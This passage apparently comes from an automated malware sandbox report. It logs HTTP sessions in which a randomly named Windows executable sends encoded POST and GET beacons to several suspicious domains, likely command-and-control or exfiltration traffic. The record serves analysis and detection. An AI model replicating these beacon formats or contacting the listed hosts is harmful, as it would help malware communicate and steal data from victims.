                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Data Ascii: 8z=RSb5LTpCCFtBUYphcU3B/liZjnzVEY7szHAGvYD1xZWI9ZwaPxtPksEgYTFOdA7llx2+BUoDU0twxWZLGsDJcs9+RjbFICzsvRSktmZG58iDwH2IZkaI0TyTPWlPtCX1a0th2pbUBdz8ACfpx4j/+rP1LXPPodSlgAoofRWWe5EQupQ77mMz/tDxuiZtEGz8rPSIwbHXW8NWtQYBUDN1XtmBtgUO
Nov 24, 2024 08:20:48.959914923 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                          Connection: close
                                                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                          pragma: no-cache
                                                                                          content-type: text/html
                                                                                          content-length: 1251
                                                                                          date: Sun, 24 Nov 2024 07:20:49 GMT
                                                                                          server: LiteSpeed
                                                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                                                          Nov 24, 2024 08:20:48.960010052 CET | 253 | IN
                                                                                          Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          11 | 192.168.2.5 | 49905 | 74.48.143.82 | 80 | 2020 | C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Nov 24, 2024 08:20:50.381197929 CET | 1757 | OUT | POST /mlxg/ HTTP/1.1
                                                                                          Host: www.bpgroup.site
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.bpgroup.site
                                                                                          Referer: http://www.bpgroup.site/mlxg/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 1239
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Data Ascii: 8z= [TRUNCATED]
                                                                                          Nov 24, 2024 08:20:51.617497921 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                          Connection: close
                                                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                          pragma: no-cache
                                                                                          content-type: text/html
                                                                                          content-length: 1251
                                                                                          date: Sun, 24 Nov 2024 07:20:52 GMT
                                                                                          server: LiteSpeed
                                                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                                                          Nov 24, 2024 08:20:51.617532015 CET | 253 | IN
                                                                                          Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          12 | 192.168.2.5 | 49912 | 74.48.143.82 | 80 | 2020 | C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Nov 24, 2024 08:20:53.042900085 CET | 472 | OUT | GET /mlxg/?8z=cQzZIkxePH03UbtQeBzk4injmTvYH6638l8io/jKjoXZ1YEXRx5ntf5pTkNOcA/fsinJED0Fc0Ua6QV4aMGrU+xVd2/bH1iEsgunrHUhzfTGxWnvWCfN9FDnBntbsziOAg==&afwXa=6nnHQlkprRILE HTTP/1.1
                                                                                          Host: www.bpgroup.site
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Nov 24, 2024 08:20:54.302943945 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                          Connection: close
                                                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                          pragma: no-cache
                                                                                          content-type: text/html
                                                                                          content-length: 1251
                                                                                          date: Sun, 24 Nov 2024 07:20:54 GMT
                                                                                          server: LiteSpeed
                                                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                                                          Nov 24, 2024 08:20:54.302983999 CET | 253 | IN
                                                                                          Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          13 | 192.168.2.5 | 49927 | 13.248.169.48 | 80 | 2020 | C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Nov 24, 2024 08:20:59.693301916 CET | 729 | OUT | POST /dash/ HTTP/1.1
                                                                                          Host: www.fortevision.xyz
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.fortevision.xyz
                                                                                          Referer: http://www.fortevision.xyz/dash/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 203
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Data Ascii: 8z=VOvhtrAHAUQdisOXZNLjcKKd0sfO2JBSaHER2T3cSKjvRvVgJltuEDoBQhx1oeAh1/HN3r9PyGYPpjYO3gNPju9jUJSDD9I2v/j0+5cuxFU/u93ix4qaeeeSXPuPs8h2zffxZrWvtcYOT3YL1eSGydszefB6WKt7tjNJLpz3K/2P0I9k6w3EcE7TQLfID2JkEUAE4co=


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          14 | 192.168.2.5 | 49935 | 13.248.169.48 | 80 | 2020 | C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Nov 24, 2024 08:21:02.420437098 CET | 749 | OUT | POST /dash/ HTTP/1.1
                                                                                          Host: www.fortevision.xyz
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.fortevision.xyz
                                                                                          Referer: http://www.fortevision.xyz/dash/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 223
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Data Ascii: 8z=VOvhtrAHAUQdhM+XbujjVKKCwcfO4pBeaHAR2XOZSfzvRKpgIgBuFDoBYBxw3uBv14Pz3p5PyG8Ppm8OwTlOge9hNZSWeNI2v/j0+98ExFc/uJzi3teZdeeNUPuPnchyzfekZpuVtewOT2oL1vSF9dspAvAxX7AtoDluUIKmZM+c4eMOgS/sPkXrAYX/SGoNe3Q0mL/lgFX9UNRKVXiga6i5CIpS


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          15 | 192.168.2.5 | 49942 | 13.248.169.48 | 80 | 2020 | C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Nov 24, 2024 08:21:05.080709934 CET | 1766 | OUT | POST /dash/ HTTP/1.1
                                                                                          Host: www.fortevision.xyz
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.fortevision.xyz
                                                                                          Referer: http://www.fortevision.xyz/dash/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 1239
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Data Ascii: 8z= [TRUNCATED]


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          16 | 192.168.2.5 | 49948 | 13.248.169.48 | 80 | 2020 | C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Nov 24, 2024 08:21:07.750142097 CET | 475 | OUT | GET /dash/?8z=YMHBudoHIUxH+uWLZqjBWOOezInCz6AkcjAI4kujT8yqZMh8PwdCYhUcXF8Hm7NuwJrkm81K0kAXhGwUtx1Q7rs8e/TXZIM23dD0/NRzxHRz5qXuh4PnXbyxYOGgr+8Fvg==&afwXa=6nnHQlkprRILE HTTP/1.1
                                                                                          Host: www.fortevision.xyz
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Nov 24, 2024 08:21:08.928010941 CET | 410 | IN | HTTP/1.1 200 OK
                                                                                          Server: openresty
                                                                                          Date: Sun, 24 Nov 2024 07:21:08 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 270
                                                                                          Connection: close
                                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?8z=YMHBudoHIUxH+uWLZqjBWOOezInCz6AkcjAI4kujT8yqZMh8PwdCYhUcXF8Hm7NuwJrkm81K0kAXhGwUtx1Q7rs8e/TXZIM23dD0/NRzxHRz5qXuh4PnXbyxYOGgr+8Fvg==&afwXa=6nnHQlkprRILE"}</script></head></html>


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          17 | 192.168.2.5 | 49965 | 103.21.221.87 | 80 | 2020 | C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Nov 24, 2024 08:21:15.056694984 CET | 744 | OUT | POST /mv7p/ HTTP/1.1
                                                                                          Host: www.rtpterbaruwaktu3.xyz
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.rtpterbaruwaktu3.xyz
                                                                                          Referer: http://www.rtpterbaruwaktu3.xyz/mv7p/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 203
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Data Ascii: 8z=0VM7/Aofdi5OaTSScjB0uZEl8WMvNBgSn8J69nEY2FX4hwqDDmNtmVHq4+8FYTNS16G+ED0rVvtnygwzk+CQL4crKZkpLaWxGkOL4S4FpZkIYeSg/8pv/XXb2OoiTZElI8R8LFKffKjZdmMOIAbIzhw4/HbKk+cRixcvQaJL2Vfgyuz5PtJIv83tvdu3YVIv4NsJtNM=
                                                                                          Nov 24, 2024 08:21:16.653755903 CET | 1033 | IN | HTTP/1.1 404 Not Found
                                                                                          Connection: close
                                                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                          pragma: no-cache
                                                                                          content-type: text/html
                                                                                          content-length: 796
                                                                                          date: Sun, 24 Nov 2024 07:21:16 GMT
                                                                                          server: LiteSpeed
                                                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          18 | 192.168.2.5 | 49972 | 103.21.221.87 | 80 | 2020 | C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Nov 24, 2024 08:21:17.723059893 CET | 764 | OUT | POST /mv7p/ HTTP/1.1
                                                                                          Host: www.rtpterbaruwaktu3.xyz
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.rtpterbaruwaktu3.xyz
                                                                                          Referer: http://www.rtpterbaruwaktu3.xyz/mv7p/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 223
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Data Ascii: 8z=0VM7/Aofdi5Oa3WSQkV0p5EilmMvXxhbn8F69mwI2w/4hVWDSSRtnVHqgO9uXzM/16KIEBgrVv5nyhAzkJ2RJoctB5krT6WxGkOL4S8/pfMIZuig/eBsjnXEieoiZ5FuI8ReLEW5fIrZdjoOISjL6hw+wnaz0s9Zr3F6dME11XLnzYCTVPBg8cbV/OmAJlpGiu85zaZbMBNcpIzGU2eCsX+vystI
                                                                                          Nov 24, 2024 08:21:19.323393106 CET | 1033 | IN | HTTP/1.1 404 Not Found
                                                                                          Connection: close
                                                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                          pragma: no-cache
                                                                                          content-type: text/html
                                                                                          content-length: 796
                                                                                          date: Sun, 24 Nov 2024 07:21:19 GMT
                                                                                          server: LiteSpeed
                                                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          19 | 192.168.2.5 | 49980 | 103.21.221.87 | 80 | 2020 | C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Nov 24, 2024 08:21:20.425128937 CET | 1781 | OUT | POST /mv7p/ HTTP/1.1
                                                                                          Host: www.rtpterbaruwaktu3.xyz
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.rtpterbaruwaktu3.xyz
                                                                                          Referer: http://www.rtpterbaruwaktu3.xyz/mv7p/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 1239
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Data Ascii: 8z=0VM7/Aofdi5Oa3WSQkV0p5EilmMvXxhbn8F69mwI22n4hnODADRtkVHq++9tXzN916CUEB9cVtBnzHUz1saRT4ctOZkmLaXrGkeP4RU/pfMIZougocpsw3Xb2OouTZEJI948LH6Pc4LZcD4OOhbL1hw83naC0sxWrzsUdMYP1Vbn/+jeJOo6o/bDs+GQLkJXj9Q21o8+IQtpnv/SXnjR7Wy/14VBUyoHXlF4WObEzUzq0r5iYB2THpprCtq/AqIJ4W2SXKMuntNtZ/lQIGnrrCm/qXtrfm4KZ7Pu2aN28IPBvuOgqD2q1Zd8Qzhv4txiLJtdWhz0sk/wwVGq9UeIcHFQ6Nt9/DSv5wpOIOeCgumcdiFpatwzK3owwGceWMnLnvOM0zJYPtDV65iTqsFT3wnWsB7O0b4+TlMGUAuSi0XGPhgPCBIbcxdN+IdKIaL0a8Fp7YSOgtHEAbocwO3AZlEziIxWbT7Uu1qJq2uMgZczsyivS4CmWIy5oSdHgMo2SLb8yovWdIlUyILPLCsgQDddEKGukKGFFEsXkojdTHSGUXlv+SV5Hj3RcuvePD+wbrQYpaIRZM7EV+uWTxWJitPbEnw06cqxNqaM+X2uxTmwQF2YsBMQOch6Xzbu0E7gkOi+kTGC0nHhg8mB0U7nIyBxZPfZmK3Z93oCn+qjnKExekHJTSKYNaoJSmT9Lph9Q+1i6s0Il9amQ6GwDkMml16Llw5+LMj0ASKh/cqp4cljdX24KoHx06NlMIQTLA4MIa6bIS37UFI+i7xkocPzM40oE1XvhCNqVDMgUdljtJXlsp/p2nys122KFtuCm8qxfce5AuJS4fi4oDsMyJ8U7hnC/r1inAGnODIIh7jRSj8YaWScMMpdDBiP6/T4nz+Kye5eoxlAsJQbZlc57sjYUzkj/FbrqX11JPAiFrAqmoo51l0cEUHIkVrord/LXhxO5nYsKpMdpqTUq9YCKcdRKS0/zmDuYYH5shWN3WJTsR/FszRoZ [TRUNCATED]
                                                                                          Nov 24, 2024 08:21:22.021486044 CET | 1033 | IN | HTTP/1.1 404 Not Found
                                                                                          Connection: close
                                                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                          pragma: no-cache
                                                                                          content-type: text/html
                                                                                          content-length: 796
                                                                                          date: Sun, 24 Nov 2024 07:21:21 GMT
                                                                                          server: LiteSpeed
                                                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          20 | 192.168.2.5 | 49987 | 103.21.221.87 | 80 | 2020 | C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Nov 24, 2024 08:21:23.090171099 CET | 480 | OUT | GET /mv7p/?8z=5Xkb80UCbQYKeySJYU53mvY68yMkCwQR8td5rEUSu2Sur2yiMTlgkW/d3b9rVTV1/KKKFkoFavUE13Uu3OCOJq8TGuAoUt3aFnOU+z5Bj5RQAf/d4rkt/TznqZIVeIVhXw==&afwXa=6nnHQlkprRILE HTTP/1.1
                                                                                          Host: www.rtpterbaruwaktu3.xyz
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Nov 24, 2024 08:21:24.654767036 CET | 1033 | IN | HTTP/1.1 404 Not Found
                                                                                          Connection: close
                                                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                          pragma: no-cache
                                                                                          content-type: text/html
                                                                                          content-length: 796
                                                                                          date: Sun, 24 Nov 2024 07:21:24 GMT
                                                                                          server: LiteSpeed
                                                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          21 | 192.168.2.5 | 49997 | 8.210.46.21 | 80 | 2020 | C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Nov 24, 2024 08:21:31.404820919 CET | 726 | OUT | POST /cm9a/ HTTP/1.1
                                                                                          Host: www.prhmcjdz.tokyo
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.prhmcjdz.tokyo
                                                                                          Referer: http://www.prhmcjdz.tokyo/cm9a/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 203
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Data Ascii: 8z=NtlY11u8ww8yv1Zk9AyOEZFMJNKfaJh636DIorNi/Yo5TNS9hdtsGPvMjxzA/U3Qgx3gYINsVJVpTBW7dZ22kRTcuPyncmjUeWe+N+opIDdaA2ni0/lbzcnnvSr9AWylJopKdbCEWOAqhkZUtHfKzXdbcb/4RMB6oVJEbzV3iQhlxC0zvuoxfC35nOfnOSeDzuLWLRQ=
                                                                                          Nov 24, 2024 08:21:33.009054899 CET | 508 | IN | HTTP/1.1 200
                                                                                          Server: nginx
                                                                                          Date: Sun, 24 Nov 2024 07:21:32 GMT
                                                                                          Content-Type: application/json;charset=utf-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Vary: Origin
                                                                                          Vary: Access-Control-Request-Method
                                                                                          Vary: Access-Control-Request-Headers
                                                                                          Access-Control-Allow-Origin: http://www.prhmcjdz.tokyo
                                                                                          Access-Control-Allow-Credentials: true
                                                                                          X-Content-Type-Options: nosniff
                                                                                          X-XSS-Protection: 1; mode=block
                                                                                          Data Raw: 35 34 0d 0a 7b 22 6d 73 67 22 3a 22 e8 af b7 e6 b1 82 e8 ae bf e9 97 ae ef bc 9a 2f 63 6d 39 61 2f ef bc 8c e8 ae a4 e8 af 81 e5 a4 b1 e8 b4 a5 ef bc 8c e6 97 a0 e6 b3 95 e8 ae bf e9 97 ae e7 b3 bb e7 bb 9f e8 b5 84 e6 ba 90 22 2c 22 63 6f 64 65 22 3a 34 30 31 7d 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 54{"msg":"/cm9a/","code":401}0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          22 | 192.168.2.5 | 49998 | 8.210.46.21 | 80 | 2020 | C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Nov 24, 2024 08:21:34.129774094 CET | 746 | OUT | POST /cm9a/ HTTP/1.1
                                                                                          Host: www.prhmcjdz.tokyo
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.prhmcjdz.tokyo
                                                                                          Referer: http://www.prhmcjdz.tokyo/cm9a/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 223
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Data Ascii: 8z=NtlY11u8ww8yvVpku3mOUJFDKNKfDZh+36HIopgn/Lc5Sou9iZ5sTPvM7hzF7U3fgx6TYIhsVIxpTBG7dOi3+hTe7/y5SGjUeWe+N+tyIDFaAF/i1b5a/8nk+Sr9EWzsJopodauqWN4qhkpUsSrFmndZS7/maMkBgHMRZ1MRjh965UFZ1MgZMibB3dXQfi/qpNbmVGHTjt4cXQAKFuIZduM/ZGIn
                                                                                          Nov 24, 2024 08:21:35.649779081 CET | 508 | IN | HTTP/1.1 200
                                                                                          Server: nginx
                                                                                          Date: Sun, 24 Nov 2024 07:21:35 GMT
                                                                                          Content-Type: application/json;charset=utf-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Vary: Origin
